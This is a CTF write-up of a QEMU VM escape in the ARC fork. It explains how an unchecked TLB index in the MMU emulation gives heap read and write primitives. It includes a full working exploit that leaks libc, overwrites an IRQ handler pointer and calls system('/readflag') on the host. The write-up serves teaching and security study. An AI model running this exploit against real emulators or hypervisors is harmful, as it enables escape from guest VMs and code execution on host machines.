How to pwn a QEMU 0-day

This writeup explains how I solved the Argonauts challenge during the CSCG qualifiers of 2024.

Name: Argonauts
Category: Pwn
Difficulty: Hard
Description: What a lovely emulator. It'd be a shame if anything were to happen to it. (I'm joking. Go break it. Here's the source code.)

In the Argonauts challenge, we are given access to a Linux VM. The VM is started with QEMU. The flag is stored on the host, outside of the VM, and can be obtained by running the /readflag program on the host. The goal of the challenge is to break out of the VM and gain arbitrary code execution on the host.

The QEMU code base is huge. How do you even get started on such a challenge? And how does a VM escape even work? Hopefully, this writeup makes it clear.

If you would like to try the challenge yourself before reading the writeup, you can download the challenge here.

Narrowing Down the Target
Finding the Vulnerability
Exploit Preparations
Leaking the LibC Address
Redirecting Control Flow
Putting It All Together
Summary

Narrowing Down the Target

We start by narrowing down the target. One thing we notice, by inspecting the Dockerfile, is that the VM is started with the following command:

qemu-system-arc -M virt -cpu archs -display none -monitor none -m 2G -kernel /home/ctf/vmlinux -nographic -snapshot -no-reboot

This is a standard way to emulate an operating system with QEMU. The interesting part of this command is the architecture that is emulated. ARC is a CPU family that is mostly used for embedded systems. It is not officially supported by QEMU, but it is implemented in a fork. This also explains the name of the challenge, because ARC was designed by the Argonaut Games company.

Since the QEMU code base is huge, it is unlikely that we have to find a 0-day vulnerability in the general QEMU code base. Instead, the vulnerability is probably specific to the ARC fork. We can figure out what has changed by cloning both the official QEMU repository and the ARC fork and comparing them against each other.

Running diff against the commit history of both repositories shows us the most recent mainline commit that also appears in the ARC fork. We use this to diff the ARC fork against the official QEMU repository right before the fork was made. Apart from some minor changes, most of the new code appears in folders that are specifically made for the ARC architecture. Specifically, the following folders were added:

/hw/arc
/include/hw/arc
/linux-user/arc
/target/arc
/tests/tcg/arc
/tests/tcg/arc64

The linux-user folder is not relevant to us because the challenge emulates an entire operating system, rather than a single program. The tests folders are also not used. Therefore, the vulnerability has to be either in /hw/arc or in /target/arc.

Finding the Vulnerability

Since we have narrowed down the target, we can start looking for vulnerabilities. Arbitrary code execution is usually achieved through memory corruption or general logic flaws such as command injection. The ARC specific code does not call execve or access the host filesystem, so we probably have to find a memory corruption flaw. Since we are investigating a VM, the flaw might be triggered by a specific sequence of instructions, or by any of the hardware components that are emulated.

There are various ways to find bugs. My first approach was inspired by a very cool LiveOverflow video. Because we are given shell access to the Linux VM, we can execute arbitrary programs within the VM. I grabbed the ARC ISA reference manual and simply tried to execute all possible instructions, hoping that one of them would crash the emulator. I quickly ran into a bunch of assertion failures, such as this one. Unfortunately, assertion failures cannot be used for arbitrary code execution, so I started to manually analyze the code instead.

In general, it helps to look for unsafe primitives, such as unchecked memcpy calls or fixed size arrays. Eventually, I stumbled upon the arc_mmu_get_tlb_at_index function. This looks like an unchecked array access:

static struct arc_tlb_e *
arc_mmu_get_tlb_at_index(uint32_t index, struct arc_mmu *mmu)
{
    uint32_t set = index / N_WAYS;
    uint32_t bank = index % N_WAYS;
    return &mmu->nTLB[set][bank];
}

Let's see if it is vulnerable. The above function is called in arc_mmu_aux_set_tlbcmd:

if (val == TLB_CMD_WRITE || val == TLB_CMD_WRITENI) {
    /*
    * TODO: Include index verification. We are always clearing the index as
    * we assume it is always valid.
    */
    tlb = arc_mmu_get_tlb_at_index(mmu->tlbindex & TLBINDEX_INDEX, mmu);
    tlb->pd0 = mmu->tlbpd0;
    tlb->pd1 = mmu->tlbpd1;

    /*
    * don't try to optimize this: upon ASID rollover the entire TLB is
    * unconditionally flushed for any ASID
    */
    tlb_flush_all_cpus_synced(cs);
}
if (val == TLB_CMD_READ) {
    /*
    * TODO: Include index verification. We are always clearing the index as
    * we assume it is always valid.
    */

    tlb = arc_mmu_get_tlb_at_index(mmu->tlbindex & TLBINDEX_INDEX, mmu);
    mmu->tlbpd0 = tlb->pd0;
    mmu->tlbpd1 = tlb->pd1;

    mmu->tlbindex &= ~(TLBINDEX_E | TLBINDEX_RC);
}

The following part of target/arc/mmu.h is also relevant to us:

#define TLBINDEX_INDEX  0x00001fff

#define TLB_CMD_WRITE   0x1
#define TLB_CMD_READ    0x2

#define N_SETS          256
#define N_WAYS          4
#define TLB_ENTRIES     (N_SETS * N_WAYS)

struct arc_tlb_e {
    /*
     * TLB entry is {PD0,PD1} tuple, kept "unpacked" to avoid bit fiddling
     * flags includes both PD0 flags and PD1 permissions.
     */
    uint32_t pd0, pd1;
};

struct arc_mmu {
    uint32_t enabled;

    struct arc_tlb_e nTLB[N_SETS][N_WAYS];

    /* insert uses vaddr to find set; way selection could be random/rr/lru */
    uint32_t way_sel[N_SETS];

    /*
     * Current Address Space ID (in whose context mmu lookups done)
     * Note that it is actually present in AUX PID reg, which we don't
     * explicitly maintain, but {re,de}construct as needed by LR/SR insns
     * respectively.
     */
    uint32_t pid_asid;
    uint32_t sasid0;
    uint32_t sasid1;

    uint32_t tlbpd0;
    uint32_t tlbpd1;
    uint32_t tlbpd1_hi;
    uint32_t tlbindex;
    uint32_t tlbcmd;
    uint32_t scratch_data0;
};

We can write an arbitrary value into mmu->tlbindex, mmu->tlbpd0 and mmu->tlbpd1 with an sr instruction. We can also read them with an lr instruction.

The TLBINDEX_INDEX mask restricts our index a bit. However, because TLBINDEX_INDEX is defined as 0x1FFF and N_WAYS is defined as 4, the highest set number that we can access is 0x1FFF / 4 = 0x7FF. This is a lot larger than N_SETS. Looks like we have found a vulnerability!

The vulnerability that we discovered is very powerful. We can read and write at an arbitrary offset on the heap (up to a certain limit). To turn this into arbitrary code execution, we have to do two things:

Leak an address to bypass ASLR.
Overwrite a function pointer to redirect the control flow.

Exploit Preparations

To make it easier to write the exploit, I first started the container locally and installed GDB inside.

In the challenge folder:

sudo docker build . -t argonauts
sudo docker run --privileged --name argonauts -p 1024:1024 argonauts
sudo docker exec -it argonauts /bin/bash

In the docker container:

apt update
apt install gdb

I also had to come up with a way to upload a program to the VM and execute it. The VM does not seem to have internet access, and does not seem to have a text editor installed, but we can write data to a file by using output redirection:

echo data > filename

The shell seems to have a limit of 1024 bytes per command, but we can work around that by sending multiple commands and using the append operator (>>):

echo part1 >> filename
echo part2 >> filename

To avoid problems with binary data, I encoded the program with base64. The following Python script establishes a connection with the container and uploads and executes a program:

from pwn import *
import base64

with open("program.bin", "rb") as f:
    program = f.read()

# Connect and log in
p = remote("localhost", 1024)
p.recvuntil(b"argo login: ")
p.sendline(b"argonaut")

def execute(cmd):
    p.recvuntil(b"$ ")
    p.sendline(cmd.encode())

# Upload the program as base64
data = base64.b64encode(program)
while data:
    execute("echo " + data[:1000] + " >> data")
    data = data[1000:]

execute("cat data | base64 -d > program") # Decode the program
execute("chmod +x program") # Fix permissions
execute("./program") # Run program

p.interactive()

To build a program for the ARC architecture, we also have to install the ARC toolchain on our own machine. Once it is installed, we can build programs with arc-linux-gnu-gcc.

Leaking the LibC Address

A common target for exploits is the system function of libc. To calculate its address, we have to know where libc is located in memory. To find its address, I first wrote a program that dumps the content of the heap:

In exploit.s:

.global read_aux
.global write_aux

read_aux:
    lr r0, [r0]
    j [blink]

write_aux:
    sr r1, [r0]
    j [blink]

In exploit.c:

#include <stdint.h>
#include <stdio.h>

#define AUX_TLBPD0 0x460
#define AUX_TLBPD1 0x461
#define AUX_TLBINDEX 0x464
#define AUX_TLBCOMMAND 0x465

#define TLB_CMD_READ 2

uint32_t read_aux(int id);
void write_aux(int id, uint32_t value);

uint64_t read_tlb(int index) {
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_READ);
    uint64_t pd0 = read_aux(AUX_TLBPD0);
    uint64_t pd1 = read_aux(AUX_TLBPD1);
    return pd0 | (pd1 << 32);
}

int main() {
    printf("Running exploit.\n");

    for (int i = 0; i < 0x2000; i++) {
        printf("%i: %llX\n", i, read_tlb(i));
    }

    return 0;
}

We can check whether an address belongs to libc by comparing it to the memory map with GDB. This way, I figured out that reading TLB index 6849 gives us an address of libc that is 0x2F02C0 bytes ahead of the system function.

Redirecting Control Flow

To turn the buffer overflow into arbitrary code execution, we have to overwrite a function pointer. In target/arc/cpu.h, we can see that the arc_mmu structure is embedded in a larger structure called CPUArchState:

struct CPUArchState {
    ...

    union {
      struct arc_mmu v3;
      struct arc_mmuv6 v6;
    } mmu;

    ...

    void *irq[256];

    ...
};

Note that there is an array of IRQ handlers behind the MMU structure. These are marked as void *, but they actually refer to the IRQState structure that is defined in hw/core/irq.c:

struct IRQState {
    Object parent_obj;

    qemu_irq_handler handler;
    void *opaque;
    int n;
};

void qemu_set_irq(qemu_irq irq, int level)
{
    if (!irq)
        return;

    irq->handler(irq->opaque, irq->n, level);
}

Notice that the IRQState structure contains both a function pointer and an argument. This looks like a good target.

Although there may be multiple ways to raise an IRQ, the easiest way is to write an IRQ number into the AUX_ID_aux_irq_hint register:

/* Function implementation for writing the IRQ related aux regs. */
void aux_irq_set(const struct arc_aux_reg_detail *aux_reg_detail,
                 target_ulong val, void *data)
{
    ...
    case AUX_ID_aux_irq_hint:
        qemu_mutex_lock_iothread();
        if (val == 0) {
            qemu_irq_lower(env->irq[env->aux_irq_hint]);
        } else if (val >= NR_OF_EXCEPTIONS) {
            qemu_irq_raise(env->irq[val]);
            env->aux_irq_hint = val;
        }
        qemu_mutex_unlock_iothread();
        break;
    ...
}

Finally, we use GDB to figure out where the IRQ structures are located on the heap. Luckily for us, they are not too far behind the nTLB array. For example, TLB index 7367 and 7368 allow us to overwrite the handler and argument of the 16th IRQState structure.

Now, in order to call the system function with a chosen argument, we:

Use our arbitrary write primitive to write the argument at a known address in memory.
Use our arbitrary write primitive to overwrite irq->opaque and irq->handler with the address of our argument and the address of the system function.
Use the sr instruction to trigger the IRQ handler.

Putting It All Together

We discovered a primitive that allows us to read and write at an arbitrary offset on the heap. We use the arbitrary read primitive to leak the address of libc and the address of the heap. We use the arbitrary write primitive to overwrite an IRQ callback and its argument. We make it point to the system function. Finally, we trigger the IRQ callback by writing to the AUX_ID_aux_irq_hint register.

Here is the exploit code which launches the /readflag program:

#include <stdint.h>

#define AUX_IRQ_HINT 0x201
#define AUX_TLBPD0 0x460
#define AUX_TLBPD1 0x461
#define AUX_TLBINDEX 0x464
#define AUX_TLBCOMMAND 0x465

#define TLB_CMD_WRITE 1
#define TLB_CMD_READ 2

uint32_t read_aux(int id);
void write_aux(int id, uint32_t value);

uint64_t read_tlb(int index) {
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_READ);
    uint64_t pd0 = read_aux(AUX_TLBPD0);
    uint64_t pd1 = read_aux(AUX_TLBPD1);
    return pd0 | (pd1 << 32);
}

void write_tlb(int index, uint64_t value) {
    write_aux(AUX_TLBPD0, value & 0xFFFFFFFF);
    write_aux(AUX_TLBPD1, value >> 32);
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_WRITE);
}

int main() {
    // Leak libc address
    uint64_t libc_leak = read_tlb(6849);
    uint64_t libc_system = libc_leak - 0x2F02C0;

    // Leak heap address so that we can calculate
    // the address of our argument
    uint64_t irq_ptr = read_tlb(1263);

    // Write "/readflag" on the heap
    write_tlb(7330, 0x616C66646165722F);
    write_tlb(7331, 0x67);

    // Overwrite IRQ handler and argument
    write_tlb(7367, libc_system);
    write_tlb(7368, irq_ptr - 0x100);

    // Trigger the IRQ handler
    write_aux(AUX_IRQ_HINT, 16);
    return 0;
}

Mitigation

The vulnerability can easily be mitigated by properly verifying the TLB index bounds. This is even marked as a TODO in the code.

Summary

This section serves as a TL;DR.

The goal is to break out of a QEMU VM and gain arbitrary code execution on the host.
The arc_mmu_get_tlb_at_index function is vulnerable to a heap overflow, and gives us an arbitrary read and write primitive.
Using the overflow, we can leak the address of libc and overwrite a function pointer on the heap, along with an argument.
We invoke the overwritten function pointer to call system("/readflag") on the host.